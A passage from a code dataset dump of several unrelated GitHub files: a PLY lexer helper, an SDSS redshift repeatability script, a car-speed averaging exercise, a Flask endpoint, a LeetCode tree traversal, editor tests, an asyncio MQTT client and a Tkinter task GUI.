my._hasIgnore\n\n\n ## hasTokens\n @property\n def hasTokens(my):\n return my._hasTokens\n \n @hasTokens.setter\n def hasTokens(my, value):\n my._hasTokens = value\n \n @hasTokens.deleter\n def hasTokens(my):\n del my._hasTokens\n\n\n ## hasLiterals\n @property\n def hasLiterals(my):\n return my._hasLiterals\n \n @hasLiterals.setter\n def hasLiterals(my, value):\n my._hasLiterals = value\n \n @hasLiterals.deleter\n def hasLiterals(my):\n del my._hasLiterals\n\n ## idCounter\n @property\n def idCounter(my):\n return my._idCounter\n \n @idCounter.setter\n def idCounter(my, value):\n my._idCounter = value\n \n @idCounter.deleter\n def idCounter(my):\n del my._idCounter\n \n \"\"\"Incrementar o valor do ID do ticket atual do objeto\"\"\"\n def idCounter_inc(my):\n my._idCounter = my._idCounter + 1\n\n ## literals\n @property\n def literals(my):\n return my._literals\n\n @literals.setter\n def literals(my, value):\n my._literals = value\n\n @literals.deleter\n def literals(my):\n del my._literals\n\n\n ## tokens\n @property\n def tokens(my):\n return my._tokens\n\n @tokens.setter\n def tokens(my, value):\n my._tokens = value\n\n @tokens.deleter\n def tokens(my):\n del my._tokens\n\n\n ##--------------------------------------------------\n ##----------------- PLYSIMPLELEX FUNCTIONS ---------\n ##--------------------------------------------------\n\n \"\"\"Adiciona os literals\"\"\"\n def addLiterals(my, lit):\n\n if literals_key in lit.keys():\n\n line = lit[lineno_key]\n\n if my._hasLiterals is False:\n lit[id_key] = my._idCounter\n my.idCounter_inc()\n my._hasLiterals = True\n my._literals = lit\n else :\n sys.exit(\"\\n#> duplicate reference of \\'literals\\' lineno: \" + str(line))\n else:\n sys.exit(\"\\n#> what you tried to add is not a \\'literals\\' statement! lineno: \" + str(line))\n\n \"\"\"Adiciona as tokens\"\"\"\n def addTokens(my, tokens):\n\n if tokens_key in tokens.keys():\n\n if my._hasTokens is False:\n #tks = {p[2] : p[5], lineno_key : my._tokenizer.lexer.lineno, comment_key : p[8]}\n # campo extra em que, para cada token, confirma se já foi definido ou não\n tokens[definedToken_key] = {}\n eachToken = tokens[definedToken_key]\n for s in tokens[tokens_key]:\n eachToken[s] = False\n tokens[id_key] = my._idCounter\n my.idCounter_inc()\n my._tokens = tokens\n my._hasTokens = True\n\n else :\n sys.exit(\"\\n#> duplicate reference of \\'tokens\\'\")\n else:\n sys.exit(\"\\n#> what you tried to add is not a \\'tokens\\' statement!\")\n\n \"\"\"Adiciona Definição de tokens\"\"\"\n def addTokenDefinition(my, variable):\n\n # se for um valor de retorno\n if return_key in variable.keys():\n \n # get da variável a retornar\n varToReturn = variable[return_key]\n # se estiver a ser especificado ANTES de ser definido - erro\n if my._hasTokens is False:\n # se os tokens ainda não tiverem sido definidos\n sys.exit(\"\"\"\\n#> unknown reference to \\'{}\\'\n Have you defined token's list?\"\"\".format(varToReturn))\n\n # se estiver a ser especificado APOS ser definido\n else:\n \n # get do dicionário de variaveis adicionadas no %tokens =\n varsDict = my._tokens[definedToken_key]\n # se a variável que estamos a especificar já estava completa - erro\n if varsDict[varToReturn] is True:\n sys.exit(\"\\n#> error! duplicate reference to \\'{}'s definition/return value\".format(varToReturn))\n # se for a primeira vez que está a ser especificada, atualizar e adicionar\n else:\n state = variable[states_key]\n if state is not None and state != \"ANY\":\n validState = False\n states = my._states[states_key]\n for st in states:\n s = (st[0])[1:-1]\n if state == s:\n validState = True\n break\n if validState is False:\n sys.exit(\"\\n#> error! unknown reference to state : \" + str(state) + \", lineno: \" + str(variable[lineno_key]))\n\n variable[id_key] = my._idCounter\n my.idCounter_inc()\n my._returns.append(variable)\n varsDict[varToReturn] = True\n\n else:\n sys.exit(\"\\n#> what you tried to add is not a \\'return\\' specification!\")\n \n \"\"\"Adiciona ignore\"\"\"\n def addIgnore(my, ignore):\n \n if ignore_key in ignore.keys():\n\n if my._hasIgnore is True:\n sys.exit(\"\\n#> duplicate reference to \\'ignore\\' statement\")\n else:\n ignore[id_key] = my._idCounter\n my.idCounter_inc()\n my._ignore = ignore\n my._hasIgnore = True\n else:\n sys.exit(\"\\n#> what you tried to add is not an \\'ignore\\' statement!\") \n \n \"\"\"Adiciona Error\"\"\"\n def addError(my, error):\n \n if error_key in error.keys():\n\n if my._hasError is True:\n sys.exit(\"\\n#> duplicate reference to \\'error\\' statement\")\n else:\n error[id_key] = my._idCounter\n my.idCounter_inc()\n my._error = error\n my._hasError = True\n else:\n sys.exit(\"\\n#> what you tried to add is not an \\'error\\' statement!\")\n\n \"\"\"Adiciona States\"\"\"\n def addStates(my, states):\n\n if states_key in states.keys():\n\n if my._hasStates is True:\n sys.exit(\"\\n#> duplicate reference to \\'state\\' statement\")\n\n else:\n states[id_key] = my._idCounter\n my.idCounter_inc()\n my._states = states\n my._hasStates = True\n else:\n sys.exit(\"\\n#> what you tried to add is not an \\'state\\' statement\")\n \n \"\"\"Adiciona Comments\"\"\"\n def addComment(my, comment):\n\n comment[id_key] = my._idCounter\n my.idCounter_inc()\n my._comments.append(comment)\n\n \"\"\"Adiciona PythonCode\"\"\"\n def addPyhtonCode(my, python):\n python[id_key] = my._idCounter\n my.idCounter_inc()\n my._pythonCode.append(python)\n\n \"\"\"Adiciona o statement encontrado a lista correta\"\"\"\n def addStatement(my, statement):\n\n ## TOKENS KEY\n if tokens_key in statement.keys():\n my.addTokens(statement)\n my._keysOrder.append(tokens_key)\n\n ## RETURN KEY\n elif return_key in statement.keys():\n my.addTokenDefinition(statement)\n my._keysOrder.append(return_key)\n \n ## LITERALS KEY\n elif literals_key in statement.keys():\n my.addLiterals(statement)\n my._keysOrder.append(literals_key)\n \n ## IGNORE KEY\n elif ignore_key in statement.keys():\n my.addIgnore(statement)\n my._keysOrder.append(ignore_key)\n \n ## ERROR KEY\n elif error_key in statement.keys():\n my.addError(statement)\n my._keysOrder.append(error_key)\n \n ## STATE KEY\n elif states_key in statement.keys():\n my.addStates(statement)\n my._keysOrder.append(states_key)\n\n ## COMMENT KEY\n elif comment_key in statement.keys():\n my.addComment(statement)\n my._keysOrder.append(comment_key)\n\n ## PYTHON KEY\n elif python_key in statement.keys():\n my.addPyhtonCode(statement)\n my._keysOrder.append(python_key)\n\n ## UNKNOWN KEY - ERROR\n else:\n sys.exit(\"\\n#> error: unknown statement!! lineno: \" + str(statement[lineno_key]))\n\n\n \n \"\"\"Confirma se o LEX do plySimple está completo e pode prosseguir para a configuração do YACC\"\"\"\n def isReady(my):\n\n if my._hasTokens is False: \n sys.exit(\"PlySimple-error: tokens are missing!\")\n # precisa terminar!\n \n elif my._hasIgnore is False:\n print(\"#> Warning: ignore characters are missing!\")\n # não precisa terminar! \n\n if my._hasError is False:\n print(\"#> Warning: error rule is missing!\") \n # não precisa terminar!\n \n varsDict = my._tokens[definedToken_key]\n for variable in varsDict:\n if varsDict[variable] is False:\n sys.exit(\"PlySimple-error: rule definition for variable \\\"\" + variable + \" is missing!\")\n # precisa terminar!\n return True \n\n\n \"\"\"Imprime as variáveis que já se encontram guardadas na classe\"\"\"\n def printVariables(my):\n\n for v in vars(my):\n print(v , \"-> \", vars(my)[v])\n \n\n\n \n","repo_name":"DMdSA/PL-Projetos","sub_path":"TP02/src/plySimple/plySimpleLex.py","file_name":"plySimpleLex.py","file_ext":"py","file_size_in_byte":12362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6374023071","text":"import pyfits\nimport glob\nimport numpy as N\nimport pylab as P\nimport os\nimport shutil\nimport sys\n\nclass Repeatability:\n\n directory = '/uufs/astro.utah.edu/common/home/u0814744/compute/scratch/repeatability'\n\n @staticmethod\n def makeSpAllRepeats():\n\n hdu = pyfits.open('/uufs/chpc.utah.edu/common/home/sdss02/ebosswork/eboss/spectro/redux/test/bautista/test_dr14/spAll-test_dr14.fits')\n\n print('Selecting LRGs')\n a = hdu[1].data\n w = N.where( a.EBOSS_TARGET1 & 2 > 0)[0]\n a = a[w]\n\n\n wr = list()\n\n for i in range(len(a)):\n sys.stderr.write('\\r '+str(i)+' '+str(len(a)))\n t = a.THING_ID[i]\n w = N.where( a.THING_ID == t )[0]\n if len(w) > 1:\n wr.extend(w)\n print(len(wr))\n\n wr = N.unique(N.array(wr))\n newa = a[wr]\n print(len(N.unique( newa.THING_ID )), 'repeats')\n newhdu = pyfits.BinTableHDU(data=newa)\n newhdu.writeto(Repeatability.directory+'/spAll-v5_10_0-repeats_lrg.fits')\n\n @staticmethod\n def getDeltaVexistent():\n\n a = pyfits.open(Repeatability.directory+'/spAll-v5_10_0-repeats_lrg.fits')[1].data\n\n data = N.empty( 0, dtype= [ ('thing_id', int), ('dv', float), ('z1', float), \\\n ('z2', float), ('dc1', float), ('dc2', float), \\\n ('dc_min', float)])\n for i in range(len(a)):\n t = a.THING_ID[i]\n if t in data['thing_id']:\n continue\n w = N.where( a.THING_ID == t)[0]\n if a.RCHI2DIFF_NOQSO[w[0]] < a.RCHI2DIFF_NOQSO[w[1]]:\n j1 = w[1]\n j2 = w[0]\n else:\n j1 = w[0]\n j2 = w[1]\n\n z1 = a.Z_NOQSO[j1]\n z2 = a.Z_NOQSO[j2]\n dc1 = a.RCHI2DIFF_NOQSO[j1]\n dc2 = a.RCHI2DIFF_NOQSO[j2]\n\n c_kms = 299792.458\n dv = abs(z1-z2)*c_kms/(1+min([z1, z2]))\n dc_min = min([dc1, dc2])\n\n data = N.append(data, N.array( (t, dv, z1, z2, dc1, dc2, dc_min), dtype=data.dtype))\n\n return data\n\n @staticmethod\n def getDeltaVsplits(guy=0):\n\n dir = '/uufs/chpc.utah.edu/common/home/sdss02/ebosswork/eboss/spectro/redux/test/bautista'\n if guy:\n a = pyfits.open(dir+'/v5_8_guy_split1/spAll-v5_8_guy_split1.fits')[1].data\n b = pyfits.open(dir+'/v5_8_guy_split2/spAll-v5_8_guy_split2.fits')[1].data\n else:\n a = pyfits.open(dir+'/split1/spAll-split1.fits')[1].data\n b = pyfits.open(dir+'/split2/spAll-split2.fits')[1].data\n\n w = N.where( a.EBOSS_TARGET1 & 2 > 0)[0]\n ngals = len(w)\n a = a[w]\n b = b[w]\n\n data = N.empty( 0, dtype= [ ('thing_id', int), ('dv', float), ('z1', float), \\\n ('z2', float), ('dc1', float), ('dc2', float), \\\n ('dc_min', float)])\n for i in range(ngals):\n t = a.THING_ID[i]\n if b.THING_ID[i] != t:\n print('Mismatch in thing_id!', t, b.THING_ID[i])\n\n if a.RCHI2DIFF_NOQSO[i] < b.RCHI2DIFF_NOQSO[i]:\n z1 = b.Z_NOQSO[i]\n z2 = a.Z_NOQSO[i]\n dc1 = b.RCHI2DIFF_NOQSO[i]\n dc2 = a.RCHI2DIFF_NOQSO[i]\n else:\n z1 = a.Z_NOQSO[i]\n z2 = b.Z_NOQSO[i]\n dc1 = a.RCHI2DIFF_NOQSO[i]\n dc2 = b.RCHI2DIFF_NOQSO[i]\n\n c_kms = 299792.458\n dv = abs(z1-z2)*c_kms/(1+ min([z1, z2]))\n dc_min = min([dc1, dc2])\n\n data = N.append(data, N.array( (t, dv, z1, z2, dc1, dc2, dc_min), dtype=data.dtype))\n\n\n return data\n\n @staticmethod\n def getRepeatsData():\n data1 = Repeatability.getDeltaVexistent()\n data2 = Repeatability.getDeltaVsplits()\n data = N.append(data1, data2)\n return data\n\n @staticmethod\n def makeComp(save=0):\n\n data = Repeatability.getRepeatsData()\n\n dc = data['dc_min']\n dv = data['dv']\n\n P.figure()\n P.plot( dc, dv, 'k.', alpha=0.4)\n P.ylim(0.1, 1e6)\n P.xlim(1e-6, 1)\n P.xscale('log')\n P.yscale('log')\n ylim = P.ylim()\n P.plot( [1e-2, 1e-2], ylim, 'b--', lw=2)\n P.plot( [5e-3, 5e-3], ylim, 'r--', lw=2)\n P.plot( [1e-6, 1], [1000, 1000], 'm--', lw=2)\n P.xlabel(r'$\\Delta \\chi^2/dof$')\n P.ylabel(r'$\\Delta v$ (km/s)')\n P.tight_layout()\n if save:\n P.savefig(Repeatability.directory+'/plots/Repeat_all_rchi2_vel.pdf',\\\n bbox_inches='tight')\n\n ngals = len(dv)*1.\n print('Total galaxies in plot', ngals)\n print(' dchi2 < 0.01', N.sum( dc< 0.01), N.sum( dc< 0.01)/ngals)\n print(' dchi2 < 0.005', N.sum( dc< 0.005), N.sum( dc< 0.005)/ngals)\n print(' dv > 1000 km/s', N.sum( dv > 1000.), N.sum( dv > 1000.)/ngals)\n\n return data\n\n\n\n","repo_name":"timahutchinson/redmonster","sub_path":"python/redmonster/sandbox/RepeatsPlot.py","file_name":"RepeatsPlot.py","file_ext":"py","file_size_in_byte":5032,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"22968245869","text":"adatok = []\natlag = []\n\nforras = open(\"sebesseg.txt\")\n\nfor sor in forras:\n sor = sor.strip().split()\n sor = list(map(int, sor))\n adatok.append(sor)\nprint(adatok)\n\n#Hány autó adatát rögzítették?\nprint(len(adatok),\" autó adatát rögzítették.\")\n\nfor i in adatok:\n v_atlag = round(sum(i)/len(i),2)\n atlag.append(v_atlag)\n\nprint(atlag)\n# A legnagyobb átlagsebességű autó\nmax_atlag = max(atlag)\nprint(\"A(z)\", str(atlag.index(max_atlag)+1),\". autó átlagsebessége volt a legnagyobb: \", max_atlag)\n\nfor i in range(len(atlag)):\n print(\"Az\", i+1, \". autó legnagyobb sebessége\", atlag[i], \"km/h\")\n\nforras.close()\n\ncel = open(\"atlagsebesseg.txt\", \"w\")\n\nfor i in range(len(atlag)):\n cel.write(str(i+1) + \" \" + str(atlag[i]) + \"\\n\")\n cel.write(\"\\n2023\\n\")","repo_name":"peterteszary/Vasvari-Code-Repository-For-Study-Purposes","sub_path":"Python Projects/Class_Pys/sebesseg.py","file_name":"sebesseg.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"hu","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"38801878980","text":"from flask import Flask, request\nimport json\nimport requests\nimport sklearn\n\nprint('The nltk version is {}.'.format(nltk.__version__))\nprint('The scikit-learn version is {}.'.format(sklearn.__version__))\napp = Flask(__name__)\n\n\n@app.route('/api/foo/', methods=['GET'])\ndef foo():\n bar = request.args.to_dict()\n #japp_json = json.dumps(bar)\n\n response = app.response_class(\n response=json.dumps(bar),\n status=200,\n mimetype='application/json'\n )\n return response\n\nif __name__ == '__main__': \n app.run(debug=True)","repo_name":"MohamedAliBenAlaya/Autoplus_DataScience","sub_path":"app1.py","file_name":"app1.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36642274445","text":"\n'''\n1. Make Sure You Understand the Problem\n 0 1\n 1 2 3\n 2 4 5 6 \n 3 8 9\n\n2. Design a Solution / Runtime and Space Complexity\nHave a levels outout list\nnext_level queue with our root in it \n\nwhile there is a root and next_level. Set cur_level = next_level. Reset next level as new queue\nappend a new list to levels.\n\nWant to add each node in cur_levels to levels output list. Then add each of their children to our next_level queue\n\nreturn reverse levels list\n\n3. Write a Template for Code in Logical Blocks. Aka Pseudocode\nnext level initialized with root node\nlevels output list\n\nwhile root and next_level:\n cur_level = next_level\n reset next level\n append new list to output levels list\n\n # Append node to last list in output list\n for node in cur_levels\n levels[-1].append(node)\n\n if left child add to next level\n if right child add to next level\n\n\nreturn reversed levels list\n4. Write the Code And Pass Test Cases.\n'''\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nfrom collections import deque\nclass Solution:\n def levelOrderBottom(self, root: Optional[TreeNode]) -> List[List[int]]:\n # Level order\n next_level = deque()\n next_level.append(root)\n \n answer = []\n\n while root and next_level:\n cur_level = next_level\n next_level = deque()\n answer.append([]) \n \n # Add each node in current level\n for node in cur_level:\n answer[-1].append(node.val)\n \n if node.left:\n next_level.append(node.left)\n if node.right:\n next_level.append(node.right)\n \n answer.reverse()\n return answer\n ","repo_name":"balanced-energy/leetcode","sub_path":"0107-binary-tree-level-order-traversal-ii/0107-binary-tree-level-order-traversal-ii.py","file_name":"0107-binary-tree-level-order-traversal-ii.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37420606961","text":"import EditorTest\n\nimport unittest\n\nfrom model.AssetsModel import AssetsModel\n\nfrom utils.AppConfig import AppConfig\n\nfrom native.EditorNative import EditorNative\nfrom native.EntityNativeLoader import EntityNativeLoader\nfrom native.MemoryStream import MemoryStream\n\ndef _dumpEntityToMemoryStream(entity, stream):\n stream.writeString(entity._name)\n stream.writeBool(entity._isInternal)\n if entity._childId is not None:\n stream.writeInt(entity._childId)\n else:\n stream.writeInt(-1)\n stream.writeInt(len(entity._logics) + 1)\n entity._tmLogic.writeToStream(stream)\n for logic in entity._logics:\n logic.writeToStream(stream)\n stream.writeInt(len(entity._children))\n for child in entity._children:\n _dumpEntityToMemoryStream(child, stream)\n\nclass EntityContentTests(unittest.TestCase):\n\n ASSETS = None\n EDITOR = None\n\n @classmethod\n def setUpClass(cls):\n cls.ASSETS = AssetsModel(AppConfig())\n if not cls.ASSETS.init():\n cls.ASSETS = None\n raise RuntimeError(\"Can't init Assets model\")\n cls.EDITOR = EditorNative(AppConfig())\n if not cls.EDITOR.init():\n cls.EDITOR = None\n raise RuntimeError(\"Can't init editor native\")\n\n @classmethod\n def tearDownClass(cls):\n if cls.EDITOR is not None:\n cls.EDITOR.deinit()\n cls.EDITOR = None\n\n def _getAssets(self):\n return EntityContentTests.ASSETS\n\n def _getEntityLoader(self):\n return EntityContentTests.EDITOR.getEntityLoader()\n\n def testLoadOfAllEntities(self):\n fileTree = self._getAssets().getEntitiesTree()\n loadList = []\n for item in fileTree.getChildren():\n loadList.append(item)\n while len(loadList) > 0:\n item = loadList[-1]\n loadList.pop()\n if item.isDir():\n for childItem in item.getChildren():\n loadList.append(childItem)\n else:\n entity = self._getEntityLoader().loadEntity(item.getRelativePath())\n self.assertIsNotNone(entity)\n self.assertTrue(entity.loadToNative())\n entity.unloadFromNative()\n\nif __name__ == \"__main__\":\n unittest.main()","repo_name":"lastcolour/GamePractice","sub_path":"Sources/Editor/Tests/EntityContentTests.py","file_name":"EntityContentTests.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"540381467","text":"import asyncio\nimport threading\nimport re\nimport logging\nimport json\nimport os\nimport queue\nimport time\nfrom uuid import uuid4\nfrom hbmqtt.client import MQTTClient\nfrom hbmqtt.mqtt.constants import QOS_0\n\nclass CustomMqttClient(MQTTClient):\n def __init__(self, client_id=None, config=None, loop=None, on_reconnect=None):\n super(CustomMqttClient, self).__init__(client_id, config, loop)\n self.on_reconnect = on_reconnect\n\n async def reconnect(self, cleansession=True):\n code = await super(CustomMqttClient, self).reconnect(cleansession)\n\n if self.on_reconnect is not None:\n if asyncio.iscoroutinefunction(self.on_reconnect):\n await self.on_reconnect()\n else:\n self.on_reconnect()\n\n return code\n\nclass MqttClient:\n def __init__(self, connection_string, topic_ns=os.environ.get('MQTT_TOPIC_NS', None), check_mqtt5_compatibility=True, logger=None, client_id=None):\n if client_id is None:\n client_id = MqttClient.create_client_id('MqttClient')\n\n self.logger = logger\n\n if self.logger is None:\n self.logger = logging.getLogger(client_id)\n\n self.client = CustomMqttClient(client_id, on_reconnect=self.__on_reconnect)\n self.client.config['reconnect_retries'] = 100000\n self.client.config['reconnect_max_interval'] = 2\n self.subscriptions = []\n self.check_mqtt5_compatibility = check_mqtt5_compatibility\n self.is_mqtt5_compatible = False\n self.topic_ns = None\n\n if topic_ns is not None:\n if re.fullmatch(r'^[\\/\\w]+\\/$', topic_ns) is not None:\n self.topic_ns = topic_ns\n self.logger.info('*****INFO***** Using topic namespace {}'.format(self.topic_ns))\n else:\n raise Exception('Given topic namespace {} is invalid. It has to have a trailing slash'.format(topic_ns))\n else:\n self.logger.warning('*****WARNING***** No topic namespace given. Tip: Also check all topics of your subscriptions and publications')\n\n init_future = asyncio.ensure_future(self.__init(connection_string))\n init_future.add_done_callback(self.__on_init_complete)\n\n self.init_complete_future = asyncio.get_event_loop().create_future()\n\n async def publish_json(self, topics, json_, options=None):\n if options is None:\n options = {}\n\n self.__validate_json(json_)\n\n await self.publish(topics, json.dumps(json_, separators=(',', ':')), options)\n\n async def publish(self, topics, message, options=None):\n if options is None:\n options = {}\n\n await self.init_complete_future\n\n if isinstance(topics, list) is False:\n topics = [topics]\n\n options = {**{'qos': QOS_0, 'retain': False}, **options}\n\n for topic in topics:\n prefixed_topic = self.__prefix_topic_ns(topic)\n self.logger.debug('Sending {} to {}'.format(message, prefixed_topic))\n await self.client.publish(prefixed_topic, message.encode('utf-8'), qos=options['qos'], retain=options['retain'])\n\n async def subscribe_json(self, topic, callback, qos=0):\n await self.subscribe(topic, callback, qos, True)\n\n async def subscribe(self, topic, callback, qos=QOS_0, to_json=False):\n await self.init_complete_future\n\n topic = self.__prefix_topic_ns(topic)\n\n subscription = Subscription(topic, callback, to_json, qos)\n\n self.subscriptions.append(subscription)\n\n await self.client.subscribe([(topic, qos)])\n\n self.logger.debug('Successfully subscribed to topic {}'.format(topic))\n\n return subscription\n\n async def disconnect(self):\n await self.client.disconnect()\n\n async def unsubscribe(self, topics):\n await self.init_complete_future\n\n await self.client.unsubscribe(topics)\n\n @staticmethod\n def create_client_id(prefix):\n return '{}-{}'.format(prefix, str(uuid4())[:8])\n\n async def __init(self, connection_string):\n # Connecting\n self.logger.info('Connecting...')\n\n while True:\n try:\n await self.client.connect(connection_string, cleansession=True)\n break\n except:\n await asyncio.sleep(1)\n\n self.logger.info('Starting on_message co-routine...')\n\n # Start message coroutine in background\n self.on_message_future = asyncio.ensure_future(self.__run_on_message())\n\n # Check for mqtt5 here\n if self.check_mqtt5_compatibility and self.is_mqtt5_compatible is False:\n await self.__mqtt5_probe(self.client, int(os.environ.get('MQTT5_PROBE_TIMEOUT', 1000)))\n\n def __on_init_complete(self, fut):\n try:\n # Check if an exception was raised during initialization\n fut.result()\n self.init_complete_future.set_result(True)\n # pylint: disable=broad-except\n except Exception as err:\n self.init_complete_future.set_exception(err)\n\n def __prefix_topic_ns(self, topic):\n if self.topic_ns is None:\n return topic\n\n return re.sub(r'^(\\$share\\/[^\\/]+\\/)?(?:{})?(.+)'.format(self.topic_ns), r'\\1' + self.topic_ns + r'\\2', topic)\n\n async def __on_reconnect(self):\n for subscription in self.subscriptions:\n if subscription.should_unsubscribe:\n continue\n\n self.logger.debug('Resubscribing to {}'.format(subscription.topic))\n await self.client.subscribe([(subscription.topic, subscription.qos)])\n\n async def __mqtt5_probe(self, client, timeout_ms):\n self.logger.debug('Start MQTT5 Probing...')\n\n probe_uuid = str(uuid4())[0:8]\n\n publish_to = 'probe/{}'.format(probe_uuid)\n subscribe_to = self.__prefix_topic_ns('$share/{}/{}'.format(str(uuid4())[0:8], publish_to))\n # Prefix the publish to topic\n publish_to = self.__prefix_topic_ns(publish_to)\n\n probe_subscription = ProbeSubscription(subscribe_to)\n self.subscriptions.append(probe_subscription)\n\n self.logger.debug('Probe subscription is {}'.format(subscribe_to))\n\n await client.subscribe([\n (subscribe_to, QOS_0)\n ])\n\n self.logger.debug('Publishing probe to {}'.format(publish_to))\n\n await client.publish(publish_to, 'probe-{}'.format(probe_uuid).encode('utf-8'), qos=QOS_0)\n\n timeout_at_ms = time.time() * 1000 + timeout_ms\n\n try:\n while probe_subscription.received_response is False:\n if time.time() * 1000 > timeout_at_ms:\n raise Exception('Probe on topic {} was not received on topic {}. An MQTT5 compilant broker is required'.format(publish_to, subscribe_to))\n\n await asyncio.sleep(0.1)\n finally:\n probe_subscription.unsubscribe()\n await self.client.unsubscribe([subscribe_to])\n self.subscriptions.remove(probe_subscription)\n\n self.is_mqtt5_compatible = True\n\n async def __run_on_message(self):\n while True:\n try:\n msg = await self.client.deliver_message()\n\n i = len(self.subscriptions) - 1\n\n while i >= 0:\n subscription = self.subscriptions[i]\n i -= 1\n if subscription.should_unsubscribe:\n await self.client.unsubscribe([subscription.topic])\n self.subscriptions.remove(subscription)\n continue\n\n subscription.messages.put_nowait(msg)\n # pylint: disable=broad-except\n except Exception as err:\n self.logger.warning(err)\n await asyncio.sleep(1)\n\n def __validate_json(self, json_=None):\n if json_ is not None and (isinstance(json_, dict) or isinstance(json_, list)):\n return\n\n raise Exception('Given JSON document is neither a dictionary nor a list')\n\nclass NamedMqttClient(MqttClient):\n def __init__(self, name, connection_string, topic_ns=os.environ.get('MQTT_TOPIC_NS', None), check_mqtt5_compatibility=True):\n client_id = MqttClient.create_client_id('{}.MqttClient'.format(name))\n super(NamedMqttClient, self).__init__(connection_string, topic_ns, check_mqtt5_compatibility, logging.getLogger(client_id), client_id)\n\nclass Subscription:\n def __init__(self, topic, cb, to_json=False, qos=0):\n self.qos = qos\n self.topic = topic\n\n # Without shared subscription group\n # Mask $ for platform events or $SYS topics\n self.topic_regex = re.compile(\n '^{}$'.format(re.sub(r'^(\\$share\\/[^\\/]+\\/)', '', topic).replace('$', '\\\\$').replace('.', '\\\\.').replace('+', '[^\\\\/]+').replace('#', '.*'))\n )\n\n self.messages = queue.Queue(0)\n self.should_unsubscribe = False\n\n self.subscription_loop = asyncio.new_event_loop()\n self.subscription_thread = threading.Thread(daemon=True, target=self.__start_subscription, args=(self.subscription_loop, cb, to_json,))\n self.subscription_thread.start()\n\n def unsubscribe(self):\n self.should_unsubscribe = True\n self.messages.put_nowait(None)\n self.subscription_thread.join()\n\n def __start_subscription(self, subscription_loop, cb, to_json):\n asyncio.set_event_loop(subscription_loop)\n subscription_loop.run_until_complete(self.__wrap_subscription_callback(cb, to_json))\n\n async def __wrap_subscription_callback(self, callback, to_json=False):\n while self.should_unsubscribe is False:\n message = self.messages.get(block=True)\n\n if message is None:\n continue\n\n if self.topic_regex.fullmatch(message.topic) is None:\n continue\n\n decoded_message = message.publish_packet.payload.data.decode('utf-8')\n\n if to_json:\n try:\n decoded_message = json.loads(decoded_message)\n self.__validate_json(decoded_message)\n # pylint: disable=broad-except\n except Exception:\n # json.JSONDecodeError from json.loads or Exception from __validate_json\n # Skip that message, since it's not a valid JSON document\n continue\n\n if asyncio.iscoroutinefunction(callback):\n await asyncio.ensure_future(callback(decoded_message, message.topic))\n else:\n callback(decoded_message, message.topic)\n\n def __validate_json(self, json_=None):\n if json_ is not None and (isinstance(json_, dict) or isinstance(json_, list)):\n return\n\n raise Exception('Given JSON document is neither a dictionary nor a list')\n\nclass ProbeSubscription(Subscription):\n def __init__(self, topic):\n super(ProbeSubscription, self).__init__(topic, self.__on_probe_receive, False)\n self.received_response = False\n\n # pylint: disable=unused-argument\n async def __on_probe_receive(self, msg, topic):\n asyncio.get_event_loop().call_soon_threadsafe(self.__set_received, [True])\n\n def __set_received(self, received):\n self.received_response = received\n","repo_name":"gunnarx/iot-event-analytics","sub_path":"src/sdk/python/pkg/iotea/core/util/mqtt_client.py","file_name":"mqtt_client.py","file_ext":"py","file_size_in_byte":11270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"1522285269","text":"# -*- coding: utf-8 -*-\n\n\n'''\nDownload Anaconda Distribution for Python 2.7 version \nhttps://www.anaconda.com/download/#windows \n\ntkintertable \npip install tkintertable \n'''\n\nimport Tkinter as tk \nimport tkMessageBox\nimport ttk \n#from ttk import * \nfrom Tkinter import Menu \nfrom Tkinter import StringVar \n#to use tkintertable \nfrom tkintertable import TableCanvas, TableModel \n\n#Open Replenisher GUI\nwindow = tk.Tk() \nwindow.title(\"Welcome to Replenisher Task List app\") \nwindow.geometry('800x700')\n\n#User Info\nFirstNameLab = tk.Label(window, text=\"First Name\").grid(row=0)\nLastnameLab = tk.Label(window, text=\"Last Name\").grid(row=1) \nFirstName = tk.Entry(window) \nLastName = tk.Entry(window) \nFirstName.grid(row=0, column=1) \nLastName.grid(row=1, column=1) \n\n#Login button\ndef LoginButton():\n tkMessageBox.showinfo('WLabs Replenisher', 'Successfully Login')\nLoginBTN = tk.Button(window,text='Login', command = LoginButton)\nLoginBTN.place(relx=0.5, rely=0.5, anchor=tk.CENTER) \n\n#Logout button \ndef LogoutButton():\n global window\n window.destroy() \nLogoutBTN = tk.Button(window,text='Logout', command = LogoutButton)\nLogoutBTN.place(relx=1.0, rely=0.0, anchor=tk.NE) \n\n#Menu Actions of Assignment \ndef MenuAssignments():\n AssignmentsWindow = tk.Toplevel(window)\n AssignmentsWindow.title(\"Replenisher Assignments\") \n AssignmentsWindow.geometry('800x500')\n \n UserList = [\n \"User Selection\", \n \"User1\",\n \"User2\",\n \"User3\" \n ] \n UserVariable = StringVar(AssignmentsWindow)\n UserVariable.set(UserList[0]) # default value \n UserOptionMenu = tk.OptionMenu(AssignmentsWindow, UserVariable, *UserList)\n UserOptionMenu.pack()\n \n TaskList = [\n \"Task Selection\", \n \"Task1\",\n \"Task2\",\n \"Task3\" \n ] \n TaskVariable = StringVar(AssignmentsWindow)\n TaskVariable.set(TaskList[0]) # default value \n TaskOptionMenu = tk.OptionMenu(AssignmentsWindow, TaskVariable, *TaskList)\n TaskOptionMenu.pack() \n \n def AddUserTask():\n tkMessageBox.showinfo('Add User and Task', \"Added User: \" + UserVariable.get() + \"; \" + \"Added Task: \" + TaskVariable.get() ) \n \n AddUserTaskBT = tk.Button(AssignmentsWindow, text=\"Add User and Task\", command=AddUserTask)\n AddUserTaskBT.pack()\n \n #Add a table \n '''\n RowNum = 2\n ColNum = 2\n for i in range(RowNum): \n for j in range(ColNum): \n b = 